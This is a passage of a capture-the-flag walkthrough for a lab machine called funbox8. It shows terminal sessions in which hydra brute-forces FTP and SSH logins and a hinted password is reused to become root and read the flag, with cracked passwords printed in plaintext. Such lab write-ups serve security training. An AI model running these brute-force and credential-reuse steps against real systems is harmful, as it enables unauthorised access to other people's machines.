100% |*********************************************************| 133 MiB 68.70 MiB/s 00:00 ETA
226 Transfer complete.
139921517 bytes received in 00:01 (68.67 MiB/s)
mget .good-passwd [anpqy?]?
229 Entering Extended Passive Mode (|||10353|)
150 Opening BINARY mode data connection for .good-passwd (562 bytes).
100% |*********************************************************| 562 417.04 KiB/s 00:00 ETA
226 Transfer complete.
562 bytes received in 00:00 (195.87 KiB/s)
7.7. Brute-forcing john again
- login: john password: zhnmju!!!
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# hydra -l john -P .bad-passwds -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 11:14:25
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~224132 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46 login: john password: zhnmju!!!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 11:15:12
7.8. Information gathering as user john
- Hint obtained: "Chance R00TPASSWD, because it's the same right now."
- The root password is probably the same as the one just cracked, most likely zhnmju!!!, since every other password has already been tried
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): john
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||39099|)
150 Here comes the directory listing.
dr-x------ 4 1000 1000 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1000 1000 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Feb 25 2020 .bashrc
drwx------ 2 1000 1000 4096 May 22 2021 .cache
-rw-r--r-- 1 1000 1000 807 Feb 25 2020 .profile
drwx------ 2 1000 1000 4096 May 22 2021 .todo
226 Directory send OK.
ftp> cd .todo
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||11684|)
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 22 2021 .
dr-x------ 4 1000 1000 4096 May 22 2021 ..
-rwx------ 1 1000 1000 131 May 22 2021 todo.list
226 Directory send OK.
ftp> get todo.list
local: todo.list remote: todo.list
229 Entering Extended Passive Mode (|||36045|)
150 Opening BINARY mode data connection for todo.list (131 bytes).
100% |*********************************************************| 131 358.34 KiB/s 00:00 ETA
226 Transfer complete.
131 bytes received in 00:00 (88.59 KiB/s)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat todo.list
1. Install LAMP
2. Install MAIL-System
3. Install Firewall
4. Install Plesk
5. Chance R00TPASSWD, because it's the same right now.
8. Try logging in to SSH with the FTP passwords
- login: john password: zhnmju!!!
- login: jules password: sexylady
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat user
jane
jim
john
jules
root
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat passwd
password
12345
sexylady
zhnmju!!!
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# hydra -L user -P passwd -t 4 192.168.56.46 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 11:27:28
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 16 login tries (l:4/p:4), ~4 tries per task
[DATA] attacking ssh://192.168.56.46:22/
[22][ssh] host: 192.168.56.46 login: john password: zhnmju!!!
[22][ssh] host: 192.168.56.46 login: jules password: sexylady
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 11:27:50
8.1. SSH login as john
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ssh john@192.168.56.46
john@192.168.56.46's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 01 Dec 2023 09:26:58 AM UTC
System load: 0.01 Processes: 160
Usage of /: 88.3% of 4.37GB Users logged in: 0
Memory usage: 12% IPv4 address for enp0s3: 192.168.56.46
Swap usage: 0%
=> / is using 88.3% of 4.37GB
64 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat May 22 16:03:57 2021 from 192.168.178.143
john@funbox8:~$
8.2. SSH login as jules
Skipped
9. Try switching to root
root:zhnmju!!!
john@funbox8:~$ su root
Password:
root@funbox8:/home/john# cd ~
root@funbox8:~# ls -al
total 52
drwx------ 4 root root 4096 May 22 2021 .
drwxr-xr-x 20 root root 4096 May 22 2021 ..
-rw------- 1 root root 238 May 22 2021 .bash_history
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 369 May 22 2021 root.flag
-rwxr-xr-x 1 root root 35 May 22 2021 run.sh
drwxr-xr-x 3 root root 4096 May 22 2021 snap
drwx------ 2 root root 4096 May 22 2021 .ssh
-rw------- 1 root root 15427 May 22 2021 .viminfo
root@funbox8:~# cat root.flag
|~~ | | | | |
|--| ||/~\ |~~\/~\\/o | | ||/~\ /~~|/~\ |~~\|/~\/~//~~||_//~/|/~\
| \_/|| ||__/\_//\o |__\_/|| |\__| ||__/| \/_\__|| \\/_|
created by @0815R2d2.
Congrats ! I look forward to see this on my twitter-account :-)
root@funbox8:~#